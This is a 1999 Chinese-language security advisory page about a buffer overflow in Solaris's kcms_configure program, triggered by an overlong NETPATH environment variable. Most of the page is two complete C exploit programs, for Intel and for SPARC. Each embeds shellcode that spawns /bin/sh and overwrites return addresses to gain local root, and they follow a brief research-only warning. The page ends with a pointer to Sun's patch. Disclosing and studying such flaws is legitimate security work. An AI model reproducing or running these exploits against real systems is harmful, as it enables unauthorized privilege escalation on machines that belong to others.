首页 -> 安全研究
安全研究
安全漏洞
Solaris7 kcms_configure溢出漏洞
发布日期:1999-11-29
更新日期:1999-12-30
受影响系统:
Sun Solaris 7.0_x86描述:
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5.1_x86
Sun Solaris 2.5.1
Sun Solaris 2.5_x86
Sun Solaris 2.5
kcms_configure的"-P" 选项存在的一个溢出漏洞已经在(107339-01)中报告过。
但这个程序还存在其它未发布的漏洞,因此也没有相应的补丁。
kcms_configure在NETPATH环境中指定一个长字串时会产生溢出。以下程序使用在Solaris2.6/7下
,可以得到本地root权限。
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*=============================================================================
kcms_configure Exploit for Solaris7 Intel Edition
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#define ENV "NETPATH="
#define MAXBUF 3000
#define RETADR 2088
#define RETOFS 0xad0
#define FAKEADR 2076
#define NOP 0x90
unsigned long get_sp(void)
{
__asm__(" movl %esp,%eax ");
}
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";
main()
{
char buf[MAXBUF];
unsigned int i,ip,sp;
putenv("LANG=");
sp=get_sp();
printf("ESP=0x%x\n",sp);
memset(buf,NOP,MAXBUF);
ip=sp;
buf[FAKEADR ]=ip&0xff;
buf[FAKEADR+1]=(ip>>8)&0xff;
buf[FAKEADR+2]=(ip>>16)&0xff;
buf[FAKEADR+3]=(ip>>24)&0xff;
ip=sp-RETOFS;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strncpy(buf+2500,exploit_code,strlen(exploit_code));
strncpy(buf,ENV,strlen(ENV));
buf[MAXBUF-1]=0;
putenv(buf);
execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
}
--------------------------------------------------------------------------------
/*=============================================================================
kcms_configure Exploit for Solaris2.6/7 Sparc Edition
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#define ENV "NETPATH="
#define MAXBUF 3000
#define RETADR 2116
#define RETOFS 0x1300
#define EXPADR 1200
#define FAKEADR1 2092
#define FAKEADR2 2112
#define NOP 0xa61cc013
char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
main()
{
char buf[MAXBUF];
unsigned int i,ip,sp;
putenv("LANG=");
sp=get_sp();
printf("ESP =0x%x\n",sp);
for (i=0;i<MAXBUF-4;i+=4){
buf[i+3]=NOP&0xff;
buf[i+2]=(NOP>>8)&0xff;
buf[i+1]=(NOP>>16)&0xff;
buf[i ]=(NOP>>24)&0xff;
}
ip=sp;
printf("FAKE=0x%x\n",sp);
buf[FAKEADR1+3]=ip&0xff;
buf[FAKEADR1+2]=(ip>>8)&0xff;
buf[FAKEADR1+1]=(ip>>16)&0xff;
buf[FAKEADR1 ]=(ip>>24)&0xff;
buf[FAKEADR2+3]=ip&0xff;
buf[FAKEADR2+2]=(ip>>8)&0xff;
buf[FAKEADR2+1]=(ip>>16)&0xff;
buf[FAKEADR2 ]=(ip>>24)&0xff;
ip=sp-RETOFS;
printf("EIP =0x%x\n",sp);
buf[RETADR+3]=ip&0xff;
buf[RETADR+2]=(ip>>8)&0xff;
buf[RETADR+1]=(ip>>16)&0xff;
buf[RETADR]=(ip>>24)&0xff;
strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));
strncpy(buf,ENV,strlen(ENV));
buf[MAXBUF-1]=0;
putenv(buf);
execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0);
}
建议:
Sun已经提供了相应的补丁:
http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/summary&nav=patches/pub-patches
浏览次数:7029
严重程度:0(网友投票)
绿盟科技给您安全的保障